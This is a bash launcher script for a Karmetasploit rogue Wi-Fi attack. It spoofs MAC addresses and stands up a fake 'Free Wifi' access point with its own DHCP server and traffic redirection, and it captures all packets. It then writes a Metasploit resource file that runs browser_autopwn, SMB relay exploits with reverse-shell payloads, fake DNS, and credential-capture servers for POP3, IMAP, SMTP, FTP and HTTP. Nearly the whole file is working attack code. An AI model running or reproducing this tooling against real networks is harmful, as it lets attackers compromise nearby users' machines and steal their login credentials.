#!/bin/bash #================================================= # # FILE: kmsapng.sh # # USAGE: ./kmsapng.sh # # DESCRIPTION: Script to lunch Karmetasploit # # OPTIONS: Wireless car supported by Aircrack-ng for injection. # File with MAC addresses for filtering connection # BUGS: Only has been tested with Atheros, Realteck L8187 and Ralink 2750 cards. # NOTES: Latest version of SVN of Aircrack-ng as whell as latest drivers must me used. # AUTHOR: carlos_perez(at)darkoperator.com # VERSION: 0.3.3 # CREATED: 09/23/2008 02:06:42 PM # REVISION:10/15/2008 5:00 PM added options for launching, only have spent 50 min # in total writing the script I know if I had more time I could add more to it. # 12/23/08 added options for using patched madwifi drivers with DigiNinja Karma patch # with this drivers attack is much stable and faster to implement, only limitation is # that only works with atheros cards. # 4/18/09 made changes to the creation of the Metasploit resource file do to changes in MSF. #================================================= #Initialize variable for dhcpd configuration file DHCPDCONF="/tmp/dhcpd.conf" #Initialize variable for log destination LOGDEST="/root/" #Initialize interface variable IW= #Initialize mode variable MODE= #Initilize SSID variable SSID="Free Wifi" #Initialize Macfilter file Variable FILTER="/noexist" #Initialize Metasploit Resourse file Varible MR="/noexist" #Variable with number of arguments passed to the script NUM=$# #Variable with time of launch used for log names NOW=$(date +"-%b-%d-%y-%H%M%S") #Variable with log file location for trobleshooting LOGFILE=/root/karma${NOW}.log A1="ath0" A2="wlan0" #Capture crtl-c and it will kill aproceed to clean up any process left trap cleanup INT #Usage funtion for printing the help message function usage () { echo 'Karmetasploit AP launcher by Carlos Perez for Backtrack3' echo 'Version 0.3.3' echo 'carlos_perez[at]darkoperator.com' echo "usage: kmsap.sh " echo " " echo "Options:" echo "-m : Every mode is a different approach of the attack." echo " km for regular karmetasploit attack using airbase-ng" echo " kmf for filtered attack where only targeted " echo " clients can associate to the fake AP using the" echo " filter file." echo " kma for karmetasploit attack using DigiNinja patched" echo " madwifi drivers." echo " kmaf for karmetasploit attack using DigiNinja patched" echo " madwifi drivers and mac address filtering." echo "-i : Interface supported by aircrack-ng for injection" echo "-f : Text file with mac addresses of client computers" echo " permited to connect to the fake AP used with kmf and " echo " kmaf modes, on mac address per line." echo "-s : SSID name used as the initial broadcast (Optional)" echo "-r : Metasploit Resource Script (Optional)" echo "-d : Dhcpd configuration file (Optional)" echo "-l : Destination for log files (MSF db and cap file, include " echo " trailing / Exmpl. /tmp/(Optional)" echo "-h : This help message" echo "" echo "Note: mode and interface are required for all types of attacks and -f for filtered attacks" } #Function for starting the Atheros interface using Madwifi drivers patched with DigiNinja Karma Patch #http://www.digininja.org function athap () { if [ -d $LOGDEST ] ; then echo "All logs will be saved to ${LOGDEST}" else echo "Log folder provided does not exist, saving to /root" LOGDEST="/root/" fi #Based on HD original karmetasploit scripts find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap` macchanger -A ath0 # Enable KARMA mode iwpriv ath0 karma 1 if [ $? -ne 0 ] ; then echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m" echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m" cleanup else echo -e "\033[1;32mStarting Atheros Card in Karma Mode Succesful\033[1;37m" fi # Configure the interface iwconfig ath0 essid "$SSID" iwconfig ath0 mode master iwconfig ath0 channel 6 ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0 } function athinf () { if [ -e $DHCPDCONF ] ; then echo "Using ${DHCPDCONF} for DHCPD" else echo -e "\033[1;31mConfiguration file for dhcpd does not exist or not provided generating dhcpd.conf file\033[1;37m" #echo "option domain-name-server 10.0.0.1;" > /tmp/dhcpd.conf echo "default-lease-time 60;">> /tmp/dhcpd.conf echo "max-lease-time 72;" >> /tmp/dhcpd.conf echo "ddns-update-style none;" >> /tmp/dhcpd.conf echo "authoritative;" >> /tmp/dhcpd.conf echo "log-facility local7;" >> /tmp/dhcpd.conf echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /tmp/dhcpd.conf echo "range 10.0.0.100 10.0.0.254;" >> /tmp/dhcpd.conf echo "option routers 10.0.0.1;" >> /tmp/dhcpd.conf echo "option domain-name-servers 10.0.0.1;}" >> /tmp/dhcpd.conf DHCPDCONF="/tmp/dhcpd.conf" fi #Clear any dhcp leases that might have been left behind echo > /var/lib/dhcp3/dhcpd.leases #start dhcpd daemon with special configuration file dhcpd3 -cf $DHCPDCONF ath0 >> $LOGFILE 2>&1 & if [ $? -ne 0 ] ; then echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m" cleanup else echo -e "\033[1;32mDHCPD started succesfully\033[1;37m" fi sleep 2 #capture all packets echo -e "\033[1;32mStarting Packet capture to ${LOGDEST}kms${NOW}.cap\033[1;37m" tcpdump -ni ath0 -s 0 -w "${LOGDEST}kms${NOW}.cap" >/dev/null 2>&1 & #set Blackhole Routing to bypass cached DNS entries iptables -t nat -A PREROUTING -i ath0 -j REDIRECT } # ---------- end of function athinf ---------- #funtion to set the insteface in monitor mode function monitormode () { if [ -d $LOGDEST ] ; then echo "All logs will be saved to ${LOGDEST}" else echo "Log folder provided does not exist, saving to /root" LOGDEST="/root" fi if [ $IW == $A1 ]; then ifconfig $IW down >> $LOGFILE 2>&1 & wlanconfig ath0 destroy >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A wifi0 airmon-ng start wifi0 >> $LOGFILE 2>&1 & sleep 2 elif [ $IW == $A2 ]; then ifconfig $IW down >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A wlan0 airmon-ng start wlan0 >> $LOGFILE 2>&1 & IW=mon0 sleep 2 else ifconfig $IW up >> $LOGFILE 2>&1 & echo -e "\033[1;32mChanging MAC Address\033[1;37m" macchanger -A $IW airmon-ng start $IW >> $LOGFILE 2>&1 & sleep 2 fi } # ---------- end of function monitormode ---------- #function for cleanning up any process that might have been left running function cleanup () { rm /tmp/dhcpd.conf killall -9 dhcpd3 tcpdump airbase-ng >> $LOGFILE 2>&1 & echo > /var/lib/dhcp3/dhcpd.leases airmon-ng stop $IW >> $LOGFILE if [ $MODE == "kmaf" ]; then iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 & fi exit 1 } # ---------- end of function cleanup ---------- #Function for launching regular karmetasploit attack function apall () { modprobe tun echo -e "\033[1;32mstarting fake ap\033[1;37m" airbase-ng -P -C 60 -e "$SSID" $IW >> $LOGFILE 2>&1 & #give enough time before next command for interface to come up #specialy on Virtual Machines with USB cards echo "This will take 15 seconds .............." sleep 15 } function athfiltered () { if [ -e $FILTER ]; then echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m" for M in `cat $FILTER`; do iwpriv ath0 addmac $M done iwpriv ath0 maccmd 1 else echo -e "\033[1;31mFilter File does not exist\033[1;37m" echo $FILTER #cleanup fi } #Function for launching fake AP with MAC filtering function apfiltered () { modprobe tun if [ -e $FILTER ]; then echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m" airbase-ng -P -C 60 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 & else echo -e "\033[1;31mFilter File does not exist\033[1;37m" echo $FILTER cleanup fi #give enough time before next command for interface to come up echo "This will take 15 seconds .............." sleep 15 } #funtion for setting MTU value, launching DHCP server, start packet capture #set the blackhole for any client with cached DNS entries launches metasploit function startinf () { if [ -e $DHCPDCONF ] ; then echo "File Exists" else echo -e "\033[1;31mConfiguration file for dhcpd does not exist or not provided generating dhcpd.conf\033[1;37m" #echo "option domain-name-server 10.0.0.1;" > /tmp/dhcpd.conf echo "default-lease-time 60;">> /tmp/dhcpd.conf echo "max-lease-time 72;" >> /tmp/dhcpd.conf echo "ddns-update-style none;" >> /tmp/dhcpd.conf echo "authoritative;" >> /tmp/dhcpd.conf echo "log-facility local7;" >> /tmp/dhcpd.conf echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> /tmp/dhcpd.conf echo "range 10.0.0.100 10.0.0.254;" >> /tmp/dhcpd.conf echo "option routers 10.0.0.1;" >> /tmp/dhcpd.conf echo 'option domain-name-servers 10.0.0.1;}' >> /tmp/dhcpd.conf DHCPDCONF="/tmp/dhcpd.conf" fi #set the IP address that was configured in the dhcpd.conf file #as the default geateway and DNS server ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 if [ $? -eq 255 ]; then echo -e "\033[1;31mIt appears the AP did not start check $LOGFILE for errors\033[1;37m" cleanup fi #set mtu ifconfig $IW mtu 1800 >> $LOGFILE 2>&1 if [ $? -ne 0 ]; then ifconfig at0 mtu 1400 2>&1 >> $LOGFILE fi sleep 2 #Clear any dhcp leases that might have been left behind echo > /var/lib/dhcp3/dhcpd.leases #start dhcpd daemon with special configuration file dhcpd3 -cf $DHCPDCONF at0 >> $LOGFILE 2>&1 & if [ $? -ne 0 ] ; then echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m" cleanup else echo -e "\033[1;32mDHCPD started succesfully\033[1;37m" fi sleep 2 #capture all packets echo -e "\033[1;32mStarting Packet capture to ${LOGDEST}kms.cap\033[1;37m" tcpdump -ni at0 -s 0 -w "${LOGDEST}kms${NOW}.cap" >/dev/null 2>&1 & #set Blackhole Routing to bypass cached DNS entries iptables -t nat -A PREROUTING -i at0 -j REDIRECT } #Function for launching Metasploit function lmeta () { if [ -e $MR ]; then echo -e "\033[1;32mStarting Metasploit with Resource File Provided\033[1;37m" /pentest/exploits/framework3/msfconsole -r $MR && cleanup else echo -e "\033[1;32mCreating Temporary Metasploit with Resource File\033[1;37m" echo "db_driver sqlite3" > /tmp/karma.rc echo "db_create ${LOGDEST}karma${NOW}.db" >> /tmp/karma.rc echo "use auxiliary/server/browser_autopwn" >> /tmp/karma.rc echo "setg AUTOPWN_HOST 10.0.0.1" >> /tmp/karma.rc echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc echo "set LHOST 10.0.0.1" >> /tmp/karma.rc echo "set LPORT 45000" >> /tmp/karma.rc echo "set SRVPORT 55550" >> /tmp/karma.rc echo "set URIPATH /ads" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use exploit/windows/smb/smb_relay" >> /tmp/karma.rc echo "set PAYLOAD windows/shell/reverse_tcp" >> /tmp/karma.rc echo "set LHOST 10.0.0.1" >> /tmp/karma.rc echo "set SRVPORT 139" >> /tmp/karma.rc echo "set LPORT 1390" >> /tmp/karma.rc echo "exploit" >> /tmp/karma.rc echo "use exploit/windows/smb/smb_relay" >> /tmp/karma.rc echo "set PAYLOAD windows/shell/reverse_tcp" >> /tmp/karma.rc echo "set LHOST 10.0.0.1" >> /tmp/karma.rc echo "set SRVPORT 445" >> /tmp/karma.rc echo "set LPORT 4450" >> /tmp/karma.rc echo "exploit" >> /tmp/karma.rc echo "use auxiliary/server/capture/pop3" >> /tmp/karma.rc echo "set SRVPORT 110" >> /tmp/karma.rc echo "set SSL false" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/pop3" >> /tmp/karma.rc echo "set SRVPORT 995" >> /tmp/karma.rc echo "set SSL true" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/ftp" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/imap" >> /tmp/karma.rc echo "set SSL false" >> /tmp/karma.rc echo "set SRVPORT 143" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/imap" >> /tmp/karma.rc echo "set SSL true" >> /tmp/karma.rc echo "set SRVPORT 993" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/smtp" >> /tmp/karma.rc echo "set SSL false" >> /tmp/karma.rc echo "set SRVPORT 25" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/smtp" >> /tmp/karma.rc echo "set SSL true" >> /tmp/karma.rc echo "set SRVPORT 465" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/fakedns" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/karma.rc echo "set SRVPORT 80" >> /tmp/karma.rc echo "set BGIMAGE /msf3/load.gif" >> /tmp/karma.rc echo "set SSL false" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/karma.rc echo "set SRVPORT 8080" >> /tmp/karma.rc echo "set BGIMAGE /msf3/load.gif" >> /tmp/karma.rc echo "set SSL false" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/karma.rc echo "set SRVPORT 443" >> /tmp/karma.rc echo "set BGIMAGE /msf3/load.gif" >> /tmp/karma.rc echo "set SSL true" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo "use auxiliary/server/capture/http" >> /tmp/karma.rc echo "set SRVPORT 8443" >> /tmp/karma.rc echo "set BGIMAGE /msf3/load.gif" >> /tmp/karma.rc echo "set SSL true" >> /tmp/karma.rc echo "run" >> /tmp/karma.rc echo -e "\033[1;32mStarting Metasploit\033[1;37m" /pentest/exploits/framework3/msfconsole -r /tmp/karma.rc && cleanup fi } #--------------------MAIN----------------------- while getopts ":m:i:f:s:r:d:l:" options; do case $options in m ) MODE=$OPTARG;; i ) IW=$OPTARG;; f ) FILTER=$OPTARG;; s ) SSID=$OPTARG;; r ) MR=$OPTARG;; d ) DHCPDCONF=$OPTARG;; l ) LOGDEST=$OPTARG;; h ) usage;; \? ) usage exit 1;; * ) usage exit 1;; esac done LOGFILE="${LOGDEST}karma.log" if [[ -n "$MODE" && -n "$IW" ]]; then case $MODE in km) monitormode apall startinf lmeta;; kmf) monitormode apfiltered startinf lmeta ;; kma) athap athinf lmeta ;; kmaf) athap athinf athfiltered lmeta ;; esac else usage fi